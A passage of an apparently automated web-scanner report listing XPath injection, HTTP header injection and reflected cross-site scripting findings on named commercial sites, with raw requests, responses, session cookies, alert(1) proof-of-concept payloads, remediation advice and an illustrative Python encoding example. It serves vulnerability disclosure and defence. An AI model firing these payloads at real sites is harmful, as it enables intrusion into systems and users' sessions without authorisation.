Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:01:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11034

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.8. http://community.petco.com/n/pfx/forum.aspx [config parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /n/pfx/forum.aspx

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /n/pfx/forum.aspx?webtag=fd03p00v01d1&widgetId=PTWidget2&pttv=2&nav=widget&config=recentDiscussions0001'&includeCSS=false&cdsn=568 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:01:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

4. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload e5eb5%0d%0abd0c019c16 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=e5eb5%0d%0abd0c019c16&va=1&e=30d HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ForrentCriteo=1; NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: e5eb5
bd0c019c16
=1; expires=Wed, 15-Jun-11 02:02:03 GMT; path=/; domain=.traderonline.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


4.2. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [va parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 79b52%0d%0abc60156776a was submitted in the va parameter. As in 4.1, %0d%0a decodes to a carriage return and line feed, so the text after it (bc60156776a) appears as a new header line in the response below. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=ForrentCriteo&va=79b52%0d%0abc60156776a&e=30d HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ForrentCriteo=1; NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: ForrentCriteo=79b52
bc60156776a
; expires=Wed, 15-Jun-11 02:02:10 GMT; path=/; domain=.traderonline.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


5. Cross-site scripting (reflected)
There are 76 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences. First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain; an image or asset name such as those in 5.8 to 5.13, for example, should be a short string of alphanumeric characters and a few punctuation characters, and anything else should be rejected. Second, user input should be HTML-encoded at any point where it is copied into application responses: all HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities. Neither layer is sufficient alone. Validation does not help when a value is later echoed in a context the validator did not anticipate, and HTML entity encoding does not protect data echoed inside a script block, where JavaScript string escaping is required instead (see 5.2 to 5.6).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
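The following Python example is added to illustrate the two layers for the text-between-tags context; it is not code from the report or from any of the sites listed. It reproduces the pattern behind 5.1 and 5.8 to 5.13 (a requested path concatenated raw into an error message), applies an allow-list and HTML encoding, and checks both renderings against the report's own payloads. The asset-name rule and the error template are assumptions made for the demonstration.

```python
import html
import re

# Layer 1: validate on arrival. The image endpoints in 5.8 to 5.13 serve assets
# with names such as "brand_logo007"; the allow-list below is an assumption about
# the shape of a valid name (the report does not state the real rule).
ASSET_NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def is_valid_asset_name(name: str) -> bool:
    """True only for a short name built from letters, digits, '_', '.' and '-'."""
    return ASSET_NAME_RE.fullmatch(name) is not None


# Layer 2: HTML-encode on output. html.escape() turns & < > " ' into entities,
# so a reflected value can never open a tag or an attribute in text context.
def html_encode(value: str) -> str:
    return html.escape(value, quote=True)


# Constructed error template in the style of the 403 bodies under 5.8 to 5.13.
TEMPLATE_PREFIX = "<p>Unable to find "
TEMPLATE_SUFFIX = "</p>"


def render_not_found_vulnerable(requested_path: str) -> str:
    """The pattern behind 5.1 and 5.8 to 5.13: the requested path is concatenated
    raw into the error body, so a <script> or <img onerror=...> survives intact."""
    return TEMPLATE_PREFIX + requested_path + TEMPLATE_SUFFIX


def render_not_found_fixed(requested_path: str) -> str:
    """Same message with the value encoded for the text-between-tags context."""
    return TEMPLATE_PREFIX + html_encode(requested_path) + TEMPLATE_SUFFIX


def reflected_part(rendered: str) -> str:
    """Strip the fixed template so only the user-controlled part is inspected."""
    return rendered[len(TEMPLATE_PREFIX):len(rendered) - len(TEMPLATE_SUFFIX)]


def contains_raw_tag(fragment: str) -> bool:
    """Crude check for comparing the two renderings: is a raw tag still present?"""
    return re.search(r"<[a-zA-Z/]", fragment) is not None


# Payloads taken from the report (5.1 and 5.8), URL-decoded, plus one legitimate
# asset name for comparison.
REPORT_PAYLOADS = [
    "68433919f96<script>alert(1)</script>8320cd70653",
    "/pacsun/AC_close_05211019ce4<img src=a onerror=alert(1)>61e2893ba50",
]
LEGITIMATE_NAME = "brand_logo007"


def demo() -> dict:
    return {
        "validation": [is_valid_asset_name(p) for p in REPORT_PAYLOADS + [LEGITIMATE_NAME]],
        "vulnerable_has_tag": [
            contains_raw_tag(reflected_part(render_not_found_vulnerable(p))) for p in REPORT_PAYLOADS
        ],
        "fixed_has_tag": [
            contains_raw_tag(reflected_part(render_not_found_fixed(p))) for p in REPORT_PAYLOADS
        ],
        "fixed_sample": render_not_found_fixed(REPORT_PAYLOADS[1]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Both report payloads fail the allow-list and, even if they reached the template, come out of the encoded rendering with every < and > turned into an entity, so the browser displays them as text rather than parsing an element.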


5.1. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the response body as plain text. The payload 19f96<script>alert(1)</script>8320cd70653 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note, however, that the reflection occurs in a 400 error response that carries no Content-Type header at all, so whether a browser renders the injected markup depends on it sniffing the body as HTML. The fix is the same either way: encode the value on output and send an explicit Content-Type (with X-Content-Type-Options: nosniff) on error responses.

Request

GET /adserver/vdi/68433919f96<script>alert(1)</script>8320cd70653?d=110 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=ChMKBjY4NDMzORi1nd_6EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@2@4dd08156@www.imiclk.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 16 May 2011 01:57:59 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/68433919f96<script>alert(1)</script>8320cd70653

5.2. http://buy.travelguard.com/TGI2/proc/stateselector.aspx [br parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /TGI2/proc/stateselector.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c35a'%3balert(1)//bd29db8f83c was submitted in the br parameter. This input was echoed as 9c35a';alert(1)//bd29db8f83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a'%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329 HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1463190879719%3B%20s_depth%3D2%7C1305512680332%3B%20gpv_pageName%3Dus_direct%253A/%7C1305543781337%3B%20s_pers_prop21%3D000329%7C1463221981339%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dus_direct%253A/%255E%255E/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255Eus_direct%253A/%2520%257C%2520/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dus_direct%2525253A/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//buy.travelguard.com/TGI2/proc/stateselector.aspx%2525253Fpcode%2525253DMYTG%25252526br%2525253Dtgdirect%25252526intcmp%2525253Dclc-001-DualCT%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:40:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   State Selector
</title><link hre
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect9c35a';alert(1)//bd29db8f83c;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.3. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /tgi2/proc/error.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e96a0'%3balert(1)//af8feb44cf2 was submitted in the br parameter. This input was echoed as e96a0';alert(1)//af8feb44cf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tgi2/proc/error.aspx?pcode=MYTG&br=e96a0'%3balert(1)//af8feb44cf2&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329&st=1&cn=1&errorID=uh HTTP/1.1
Host: buy.travelguard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a%27%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
Cookie: s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%3B%20SC_LINKS%3Dundefined%253A/TGI2/proc/stateselector.aspx%255E%255E/tgi2/app_themes/default/img/buttons/continue.gif%255E%255Eundefined%253A/TGI2/proc/stateselector.aspx%2520%257C%2520/tgi2/app_themes/default/img/buttons/continue.gif%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dundefined%2525253A/TGI2/proc/stateselector.aspx%252526pidt%25253D1%252526oid%25253Djavascript%2525253AWebForm_DoPostBackWithOptions%25252528new%2525252520WebForm_PostBackOptions%25252528%25252522ctl00%25252524ctl00%25252524purchasePathCont%252526ot%25253DA%3B; s_pers=%20s_depth%3D2%7C1305546099515%3B%20gpv_pageName%3Dundefined%253A/TGI2/proc/stateselector.aspx%7C1305546114553%3B%20s_pers_prop21%3D000329%7C1463224314554%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:12:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Error Page
</title><link href="/
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=e96a0';alert(1)//af8feb44cf2;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.4. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /tgi2/proc/error.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript rest-of-line comment (the // introduced by the earlier payload that is still present in the br value, see 5.3). The payload 7a27f%0aalert(1)//47046b6433b was submitted in the br parameter. Because %0a decodes to a line feed, the input was echoed as 7a27f, a line break, and then alert(1)//47046b6433b in the application's response. The line feed terminates the comment, so the alert(1) on the next line executes as code; this is why escaping quotes alone is not enough in a script context and line terminators must be escaped as well.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tgi2/proc/error.aspx?pcode=MYTG&br=tgdirect9c35a%27;alert(1)//bd29db8f83c7a27f%0aalert(1)//47046b6433b&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329&st=1&cn=1&errorID=uh HTTP/1.1
Host: buy.travelguard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a%27%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
Cookie: s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%3B%20SC_LINKS%3Dundefined%253A/TGI2/proc/stateselector.aspx%255E%255E/tgi2/app_themes/default/img/buttons/continue.gif%255E%255Eundefined%253A/TGI2/proc/stateselector.aspx%2520%257C%2520/tgi2/app_themes/default/img/buttons/continue.gif%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dundefined%2525253A/TGI2/proc/stateselector.aspx%252526pidt%25253D1%252526oid%25253Djavascript%2525253AWebForm_DoPostBackWithOptions%25252528new%2525252520WebForm_PostBackOptions%25252528%25252522ctl00%25252524ctl00%25252524purchasePathCont%252526ot%25253DA%3B; s_pers=%20s_depth%3D2%7C1305546099515%3B%20gpv_pageName%3Dundefined%253A/TGI2/proc/stateselector.aspx%7C1305546114553%3B%20s_pers_prop21%3D000329%7C1463224314554%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:12:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10392


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Error Page
</title><link href="/
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect9c35a';alert(1)//bd29db8f83c7a27f
alert(1)//47046b6433b
;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.5. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e0dc'%3balert(1)//3841c1206 was submitted in the u parameter. This input was echoed as 7e0dc';alert(1)//3841c1206 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=7e0dc'%3balert(1)//3841c1206 HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7Czrdrej4AXZ8pDrsX0VgpEAStDpKdrJ%2Bjt8TcUQh7JEOS2lpVt46GDr7rvlDUY4fj1zvpyDAc48qo6uZg9V7WVnv%2BrAVuXj2fOo72VUX75CXKS64EYxHT95mYYbhrAVqhPvHaTa5e8RxWCFR9XVY0qBe5iz2LQAMXuiv67NNUR5gxgPgYkDS3NnLsO3iBknvJqxJ21wxzPKXpQVnxSmYLM4l4T8thhKB4P%2FB1jXyYokWXN2dthtJxpxLl3VAiZ10BJwG2%2BUx2Wpqu7FF82cSnA%2FJ351T5nkuzQp36SjNgpw4%3D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1242
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split('/')[2]){
var url = '//dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=0&u=7e0dc';alert(1)//3841c1206';
var proto = window.location.protocol.toLowerCase();
if(proto=='https:') url = proto + url;
else url = 'http:' + url;
var now = new Date();
url += '&timecode=' + now.getTime();
if(sirefurl!=nul
...[SNIP]...

5.6. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70ad5</script><script>alert(1)</script>8c901f57b91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The payload works even though the value sits inside a quoted JavaScript string because the HTML parser ends the script element at the first </script> it sees, regardless of JavaScript quoting; a following <script> block then runs as normal. Escaping only the quote characters therefore does not fix this finding, since the payload contains none.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
